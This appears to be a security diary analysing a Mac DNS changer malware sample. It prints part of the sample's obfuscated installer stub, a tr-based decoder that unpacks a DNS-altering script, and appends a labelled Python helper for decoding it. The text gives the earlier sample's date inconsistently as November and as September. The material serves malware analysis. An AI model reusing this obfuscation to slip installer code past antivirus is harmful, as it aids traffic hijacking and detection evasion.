Back in November last year we published a diary about Mac DNS changer malware ( ).

The main idea behind that diary was to make Mac users aware that the bad guys are not ignoring this platform any more. While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.

All the malware did was change the local DNS servers to a couple of servers in a known bad network, and tell the command and control server that a new victim is ready. The anti-virus coverage was especially disappointing. Only a couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.

One of our readers, Matt, submitted a new sample today. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server. However, one thing I noticed was that the attackers started obfuscating the installation code.

The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. I would say … signature detection failure.

The new sample looks like this:

    # count the lines of the script itself (the awk program body did not survive in this copy)
    x=`cat "$0" | wc -l | awk ''`
    # skip the two-line stub
    x=`expr $x - 2`
    # decode the rest of the file with a single-letter substitution and write it to a file named 1
    tail -$x "$0" | tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
    # the DNS server addresses, encoded with two further tr commands (truncated in this copy)
    s1=cx.
    s2=cx.
    # start of the encoded body; decodes to: PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
    PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF

The deobfuscation is really simple: they take the file, count its lines, subtract 2 from the line count, tail the rest, pass it through the first tr command and redirect the output to a file named 1. The second two tr commands deobfuscate the s1 and s2 variables, which will contain the IP addresses of the DNS servers. These can be easily deobfuscated manually:
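As an added example (not code from the diary or from the malware), a small analyst helper that applies the stub's own tr mapping to the quoted obfuscated line and, for samples where the tr line is missing, recovers the substitution from a known plaintext crib. The /usr/sbin/scutil crib and the expected decoded line are assumptions based on the standard macOS tools that line calls, not text from the page.

```python
"""Added example, not code from the original diary: analyst-side recovery of a
tr-based substitution obfuscation like the one in the installer stub above."""
from typing import Dict

# The two tr sets visible in the sample: `tr OBF_SET PLAIN_SET`.
OBF_SET = "vdehrujzpbqafwtgkxyilcnos"
PLAIN_SET = "upxmfqrzibdanwgkethlcyosv"


def tr_table(src: str, dst: str) -> Dict[int, int]:
    """Build a str.translate table equivalent to `tr src dst` (equal-length sets)."""
    if len(src) != len(dst):
        raise ValueError("tr sets must have equal length for a 1:1 substitution")
    return str.maketrans(src, dst)


def deobfuscate(text: str) -> str:
    """Apply the sample's own tr mapping; characters outside the set pass through."""
    return text.translate(tr_table(OBF_SET, PLAIN_SET))


def recover_mapping(obf: str, plain: str) -> Dict[str, str]:
    """Crib-based recovery: derive the substitution from a known obfuscated/plain
    pair, for samples where the tr line itself is not available. A character that
    would have to map to two different letters means the crib is wrong."""
    if len(obf) != len(plain):
        raise ValueError("crib and ciphertext lengths differ")
    mapping: Dict[str, str] = {}
    for o, p in zip(obf, plain):
        if mapping.setdefault(o, p) != p:
            raise ValueError(f"inconsistent mapping for {o!r}")
    return mapping


# Constructed input: the obfuscated line quoted in the diary, and the plaintext
# it is assumed to decode to (scutil/grep/sed, standard macOS tools).
OBF_LINE = ("PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | "
            "okq -k 'o/.*PjphajcSkjsplk : //')<< EOF")
PLAIN_LINE = ("PSID=$( (/usr/sbin/scutil | grep PrimaryService | "
              "sed -e 's/.*PrimaryService : //')<< EOF")

if __name__ == "__main__":
    print(deobfuscate(OBF_LINE))
    # Assumed crib: /usr/sbin/scutil for the obfuscated path /voj/obpf/olvxpi.
    print(sorted(recover_mapping("/voj/obpf/olvxpi", "/usr/sbin/scutil").items()))
```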